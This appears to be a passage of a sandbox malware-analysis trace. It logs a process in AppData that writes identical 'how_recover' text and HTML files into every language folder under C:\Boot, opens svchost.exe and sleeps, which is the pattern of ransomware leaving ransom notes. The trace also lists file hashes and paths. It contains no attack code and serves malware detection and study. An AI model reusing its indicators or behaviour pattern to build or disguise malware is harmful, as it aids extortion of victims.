- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521001
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46217
- mode: close
- sequenceNumber: 499
- value: C:\Boot\es-ES\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521001
- ntstatus: 0x0
- CreateOptions: 0x0
- process:
- timestamp: 46257
- mode: opened
- sequenceNumber: 500
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1100
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 46334
- mode: created
- sequenceNumber: 501
- value: C:\Boot\es-ES\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521002
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46339
- mode: close
- sequenceNumber: 502
- value: C:\Boot\es-ES\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521002
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46380
- mode: created
- sequenceNumber: 503
- value: C:\Boot\fi-FI\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521003
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46385
- mode: close
- sequenceNumber: 504
- value: C:\Boot\fi-FI\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521003
- ntstatus: 0x0
- CreateOptions: 0x0
- process:
- timestamp: 46393
- mode: opened
- sequenceNumber: 505
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1100
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 46466
- mode: created
- sequenceNumber: 506
- value: C:\Boot\fi-FI\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521004
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46471
- mode: close
- sequenceNumber: 507
- value: C:\Boot\fi-FI\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521004
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46534
- mode: created
- sequenceNumber: 508
- value: C:\Boot\Fonts\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521005
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46572
- mode: close
- sequenceNumber: 509
- value: C:\Boot\Fonts\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521005
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46610
- mode: created
- sequenceNumber: 510
- value: C:\Boot\Fonts\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521006
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46615
- mode: close
- sequenceNumber: 511
- value: C:\Boot\Fonts\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521006
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46677
- mode: created
- sequenceNumber: 512
- value: C:\Boot\fr-FR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521007
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46681
- mode: close
- sequenceNumber: 513
- value: C:\Boot\fr-FR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521007
- ntstatus: 0x0
- CreateOptions: 0x0
- high_cpu:
- timestamp: 46686
- sequenceNumber: 514
- total_cpu: 49.253406046689626
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 49.253406046689626
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 46689
- mode: created
- sequenceNumber: 515
- value: C:\Boot\fr-FR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521008
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46693
- mode: close
- sequenceNumber: 516
- value: C:\Boot\fr-FR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521008
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46698
- mode: created
- sequenceNumber: 517
- value: C:\Boot\hu-HU\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521009
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46702
- mode: close
- sequenceNumber: 518
- value: C:\Boot\hu-HU\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521009
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46883
- mode: created
- sequenceNumber: 519
- value: C:\Boot\hu-HU\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521010
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46888
- mode: close
- sequenceNumber: 520
- value: C:\Boot\hu-HU\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521010
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46894
- mode: created
- sequenceNumber: 521
- value: C:\Boot\it-IT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521011
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46898
- mode: close
- sequenceNumber: 522
- value: C:\Boot\it-IT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521011
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 46935
- mode: created
- sequenceNumber: 523
- value: C:\Boot\it-IT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521012
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 46938
- mode: close
- sequenceNumber: 524
- value: C:\Boot\it-IT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521012
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 46974
- repeat: 70
- sequenceNumber: 525
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 47009
- mode: created
- sequenceNumber: 526
- value: C:\Boot\ja-JP\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521013
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47014
- mode: close
- sequenceNumber: 527
- value: C:\Boot\ja-JP\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521013
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47027
- mode: created
- sequenceNumber: 528
- value: C:\Boot\ja-JP\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521014
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47032
- mode: close
- sequenceNumber: 529
- value: C:\Boot\ja-JP\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521014
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47037
- mode: created
- sequenceNumber: 530
- value: C:\Boot\ko-KR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521015
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47040
- mode: close
- sequenceNumber: 531
- value: C:\Boot\ko-KR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521015
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47096
- mode: created
- sequenceNumber: 532
- value: C:\Boot\ko-KR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521016
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47101
- mode: close
- sequenceNumber: 533
- value: C:\Boot\ko-KR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521016
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47108
- mode: created
- sequenceNumber: 534
- value: C:\Boot\nb-NO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521017
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47114
- mode: close
- sequenceNumber: 535
- value: C:\Boot\nb-NO\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521017
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47136
- mode: created
- sequenceNumber: 536
- value: C:\Boot\nb-NO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521018
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47142
- mode: close
- sequenceNumber: 537
- value: C:\Boot\nb-NO\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521018
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47153
- mode: created
- sequenceNumber: 538
- value: C:\Boot\nl-NL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521019
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47159
- mode: close
- sequenceNumber: 539
- value: C:\Boot\nl-NL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521019
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47177
- mode: created
- sequenceNumber: 540
- value: C:\Boot\nl-NL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521020
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47182
- mode: close
- sequenceNumber: 541
- value: C:\Boot\nl-NL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521020
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47199
- mode: created
- sequenceNumber: 542
- value: C:\Boot\pl-PL\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521021
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47204
- mode: close
- sequenceNumber: 543
- value: C:\Boot\pl-PL\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521021
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47237
- mode: created
- sequenceNumber: 544
- value: C:\Boot\pl-PL\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521022
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47245
- mode: close
- sequenceNumber: 545
- value: C:\Boot\pl-PL\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521022
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47252
- mode: created
- sequenceNumber: 546
- value: C:\Boot\pt-BR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521023
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47257
- mode: close
- sequenceNumber: 547
- value: C:\Boot\pt-BR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521023
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47267
- mode: created
- sequenceNumber: 548
- value: C:\Boot\pt-BR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521024
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47272
- mode: close
- sequenceNumber: 549
- value: C:\Boot\pt-BR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521024
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47277
- mode: created
- sequenceNumber: 550
- value: C:\Boot\pt-PT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521025
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47281
- mode: close
- sequenceNumber: 551
- value: C:\Boot\pt-PT\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521025
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47353
- mode: created
- sequenceNumber: 552
- value: C:\Boot\pt-PT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521026
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47358
- mode: close
- sequenceNumber: 553
- value: C:\Boot\pt-PT\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521026
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47364
- mode: created
- sequenceNumber: 554
- value: C:\Boot\ru-RU\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521027
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47368
- mode: close
- sequenceNumber: 555
- value: C:\Boot\ru-RU\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521027
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47392
- mode: created
- sequenceNumber: 556
- value: C:\Boot\ru-RU\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521028
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47397
- mode: close
- sequenceNumber: 557
- value: C:\Boot\ru-RU\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521028
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47435
- mode: created
- sequenceNumber: 558
- value: C:\Boot\sv-SE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521029
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47438
- mode: close
- sequenceNumber: 559
- value: C:\Boot\sv-SE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521029
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47455
- mode: created
- sequenceNumber: 560
- value: C:\Boot\sv-SE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521030
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47460
- mode: close
- sequenceNumber: 561
- value: C:\Boot\sv-SE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521030
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47465
- mode: created
- sequenceNumber: 562
- value: C:\Boot\tr-TR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521031
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47469
- mode: close
- sequenceNumber: 563
- value: C:\Boot\tr-TR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521031
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47501
- mode: created
- sequenceNumber: 564
- value: C:\Boot\tr-TR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521032
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 47507
- mode: close
- sequenceNumber: 565
- value: C:\Boot\tr-TR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521032
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 47513
- mode: created
- sequenceNumber: 566
- value: C:\Boot\zh-CN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
